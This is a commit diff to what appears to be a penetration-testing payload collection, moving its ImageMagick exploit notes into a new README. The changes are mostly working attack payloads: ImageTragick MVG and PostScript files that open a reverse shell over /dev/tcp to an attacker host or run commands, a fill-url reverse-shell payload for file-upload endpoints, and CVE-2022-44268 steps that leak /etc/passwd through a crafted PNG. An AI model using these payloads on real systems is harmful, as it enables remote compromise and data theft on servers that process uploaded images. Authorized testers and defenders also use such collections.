ImageMagick Typo
@ -4431,3 +4431,4 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
|
|||||||
* [Getting in the Zone: dumping Active Directory DNS using adidnsdump - Dirk-jan Mollema](https://blog.fox-it.com/2019/04/25/getting-in-the-zone-dumping-active-directory-dns-using-adidnsdump/)
|
* [Getting in the Zone: dumping Active Directory DNS using adidnsdump - Dirk-jan Mollema](https://blog.fox-it.com/2019/04/25/getting-in-the-zone-dumping-active-directory-dns-using-adidnsdump/)
|
||||||
* [S4U2self abuse - TheHackerRecipes](https://www.thehacker.recipes/ad/movement/kerberos/delegations/s4u2self-abuse)
|
* [S4U2self abuse - TheHackerRecipes](https://www.thehacker.recipes/ad/movement/kerberos/delegations/s4u2self-abuse)
|
||||||
* [Abusing Kerberos S4U2self for local privilege escalation - cfalta](https://cyberstoph.org/posts/2021/06/abusing-kerberos-s4u2self-for-local-privilege-escalation/)
|
* [Abusing Kerberos S4U2self for local privilege escalation - cfalta](https://cyberstoph.org/posts/2021/06/abusing-kerberos-s4u2self-for-local-privilege-escalation/)
|
||||||
|
* [External Trusts Are Evil - 14 March 2023 - Charlie Clark (@exploitph)](https://exploit.ph/external-trusts-are-evil.html)
|
@ -1,38 +0,0 @@
|
|||||||
# Image Tragik 1 & 2
|
|
||||||
|
|
||||||
|
|
||||||
## Exploit v1
|
|
||||||
|
|
||||||
Simple reverse shell
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
push graphic-context
|
|
||||||
encoding "UTF-8"
|
|
||||||
viewbox 0 0 1 1
|
|
||||||
affine 1 0 0 1 0 0
|
|
||||||
push graphic-context
|
|
||||||
image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/ip/80 0<&1 2>&1'
|
|
||||||
pop graphic-context
|
|
||||||
pop graphic-context
|
|
||||||
```
|
|
||||||
|
|
||||||
## Exploit v2
|
|
||||||
|
|
||||||
Simple `id` payload
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
%!PS
|
|
||||||
userdict /setpagedevice undef
|
|
||||||
save
|
|
||||||
legal
|
|
||||||
{ null restore } stopped { pop } if
|
|
||||||
{ legal } stopped { pop } if
|
|
||||||
restore
|
|
||||||
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
|
|
||||||
```
|
|
||||||
|
|
||||||
then use `convert shellexec.jpeg whatever.gif`
|
|
||||||
|
|
||||||
## Thanks to
|
|
||||||
|
|
||||||
* [openwall.com/lists/oss-security/2018/08/21/2 by Tavis Ormandy](http://openwall.com/lists/oss-security/2018/08/21/2)
|
|
52
Upload Insecure Files/Picture ImageMagick/README.md
Normal file
@ -0,0 +1,52 @@
|
|||||||
|
# ImageMagick Exploits
|
||||||
|
|
||||||
|
## ImageTragik Exploit v1
|
||||||
|
|
||||||
|
Simple reverse shell
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
push graphic-context
|
||||||
|
encoding "UTF-8"
|
||||||
|
viewbox 0 0 1 1
|
||||||
|
affine 1 0 0 1 0 0
|
||||||
|
push graphic-context
|
||||||
|
image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/ip/80 0<&1 2>&1'
|
||||||
|
pop graphic-context
|
||||||
|
pop graphic-context
|
||||||
|
```
|
||||||
|
|
||||||
|
## ImageTragik Exploit v2
|
||||||
|
|
||||||
|
Simple `id` payload
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
%!PS
|
||||||
|
userdict /setpagedevice undef
|
||||||
|
save
|
||||||
|
legal
|
||||||
|
{ null restore } stopped { pop } if
|
||||||
|
{ legal } stopped { pop } if
|
||||||
|
restore
|
||||||
|
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
|
||||||
|
```
|
||||||
|
|
||||||
|
then use `convert shellexec.jpeg whatever.gif`
|
||||||
|
|
||||||
|
|
||||||
|
## CVE-2022-44268
|
||||||
|
|
||||||
|
Information Disclosure: embedded the content of an arbitrary remote file
|
||||||
|
|
||||||
|
* Generate the payload
|
||||||
|
```ps1
|
||||||
|
apt-get install pngcrush imagemagick exiftool exiv2 -y
|
||||||
|
pngcrush -text a "profile" "/etc/passwd" exploit.png
|
||||||
|
```
|
||||||
|
* Trigger the exploit by uploading the file. The backend might use something like `convert pngout.png pngconverted.png`
|
||||||
|
* Download the converted picture and inspect its content with: `identify -verbose pngconverted.png`
|
||||||
|
* Convert the exfiltrated data: `python3 -c 'print(bytes.fromhex("HEX_FROM_FILE").decode("utf-8"))'`
|
||||||
|
|
||||||
|
|
||||||
|
## Thanks to
|
||||||
|
|
||||||
|
* [openwall.com/lists/oss-security/2018/08/21/2 by Tavis Ormandy](http://openwall.com/lists/oss-security/2018/08/21/2)
|
Before Width: | Height: | Size: 194 B After Width: | Height: | Size: 194 B |
Before Width: | Height: | Size: 194 B After Width: | Height: | Size: 194 B |
After Width: | Height: | Size: 99 B |
Before Width: | Height: | Size: 424 B After Width: | Height: | Size: 424 B |
Before Width: | Height: | Size: 992 B After Width: | Height: | Size: 992 B |
@ -11,7 +11,7 @@
|
|||||||
* [Filename vulnerabilities](#filename-vulnerabilities)
|
* [Filename vulnerabilities](#filename-vulnerabilities)
|
||||||
* [Picture compression](#picture-compression-)
|
* [Picture compression](#picture-compression-)
|
||||||
* [Configuration Files](#configuration-files)
|
* [Configuration Files](#configuration-files)
|
||||||
* [CVE - Image Tragik](#cve---image-tragik)
|
* [CVE - ImageMagick](#cve---imagemagick)
|
||||||
* [CVE - FFMpeg](#cve---ffmpeg)
|
* [CVE - FFMpeg](#cve---ffmpeg)
|
||||||
* [ZIP Archive](#zip-archive)
|
* [ZIP Archive](#zip-archive)
|
||||||
* [Jetty RCE](#jetty-rce)
|
* [Jetty RCE](#jetty-rce)
|
||||||
@ -161,10 +161,11 @@ Alternatively you may be able to upload a JSON file with a custom scripts, try t
|
|||||||
}
|
}
|
||||||
```
|
```
|
||||||
|
|
||||||
### CVE - Image Tragik
|
### CVE - ImageMagick
|
||||||
|
|
||||||
Upload this content with an image extension to exploit the vulnerability (ImageMagick , 7.0.1-1)
|
If the backend is using ImageMagick to resize/convert user images, you can try to exploit well-known vulnerabilities such as ImageTragik.
|
||||||
|
|
||||||
|
* ImageTragik example: Upload this content with an image extension to exploit the vulnerability (ImageMagick , 7.0.1-1)
|
||||||
```powershell
|
```powershell
|
||||||
push graphic-context
|
push graphic-context
|
||||||
viewbox 0 0 640 480
|
viewbox 0 0 640 480
|
||||||
@ -172,7 +173,7 @@ fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-p
|
|||||||
pop graphic-context
|
pop graphic-context
|
||||||
```
|
```
|
||||||
|
|
||||||
More payload in the folder `Picture Image Magik`
|
More payloads in the folder `Picture ImageMagick`
|
||||||
|
|
||||||
### CVE - FFMpeg
|
### CVE - FFMpeg
|
||||||
|
|
||||||
|